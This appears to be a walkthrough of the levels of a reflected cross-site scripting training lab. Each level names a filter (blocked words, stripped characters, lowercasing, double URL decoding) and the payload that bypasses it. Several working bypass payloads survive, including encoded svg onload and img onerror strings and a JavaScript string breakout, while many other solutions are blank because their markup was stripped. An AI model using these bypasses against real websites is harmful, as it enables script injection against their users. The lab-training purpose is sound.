00: Supposed to be safe 01: This is has no filters at all 10: Basic HTMLi XSS Anything goes here, there is no protection 11: Here we introduced a filter to stop script and alert Solution: Solution: 12: Here we added confirm to our filter Solution: Solution: 13: Here we put your input to lowercase before sanitising it, making no longer a valid bypass Solution: 14: > seems to be stripped but we can still think of attacks without > Solution: 16.php < is still blocked but this time we are URLdecoding your input. Not just one time but twice! This means you will have to double encode your URL values: Solution: %253Csvg%2520o%256Eload%253Dalert%25281%2529%253E %2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E 17: Parenthesis are blocked BUT we can use the HTML entities Solution1: Solution2: 18: Only iframes are allowed here 20: Your code is reflected between the HTML comments so you need to end them: --> Then you can enter your text: -->--> 21: In the same context, we now block script and alert Then you can enter your text: -->--> 22: We now also block confirm Then you can enter your text: -->--> 23: Before, you can escape the filters by using uppercase characters, that is no longer possible. Then you can enter your text: -->--> 24: We are removing any > (greater then signs) Then you can enter your text: --> Then you can enter your text: --> 28: Spaces are removed --> We replace a space with "/" 30: HTML tag attribute XSS We can see a new input tag appearing on the page upon submitting a value We can break out with Solution: '> 31: alert and script are filtered Solution: '> 32: alert and script and confirm are filtered Solution: '> 33: Before, you can escape the filters by using uppercase characters, that is no longer possible. Solution: '> 34: > is filtered out '> 36: We now remove both < and > so you have to replace them with < and > 40: JS XSS We can see a new script appearing on the page upon submitting a value This does a document.write('') We can break out with Solution: ');alert();// 50: You need to disguise your XSS attack to LOOK like an email address, for example ">"@x.y 80: Only tags work here but you need to combine it with scrolling. You have to make the page scroll using a lot of
tags and then use to complete the scrolling. Enter the following in the to field:





...






















90: Because I use backticks In my JS code, you can use template literals https://labs.hackxpert.com/RXSS/GET/90.php?test=1%3C/Script/%3E%3CImg/Src/OnError=_=confirm,_(1)%3E 100: This lab will transform any input you give it into uppercase characters which might make it seem impossible but JS is a funky language. We can use HTML entities for examples to bypass this: https://labs.hackxpert.com/RXSS/GET/100.php?q=1%3C!--%3E%3CK%2FAutoFocus%2FContentEditable%2FOnFocusIn=%26%2397%26%23108%26%23101%26%23114%26%23116%26%2396%26%2375%26%2396%3E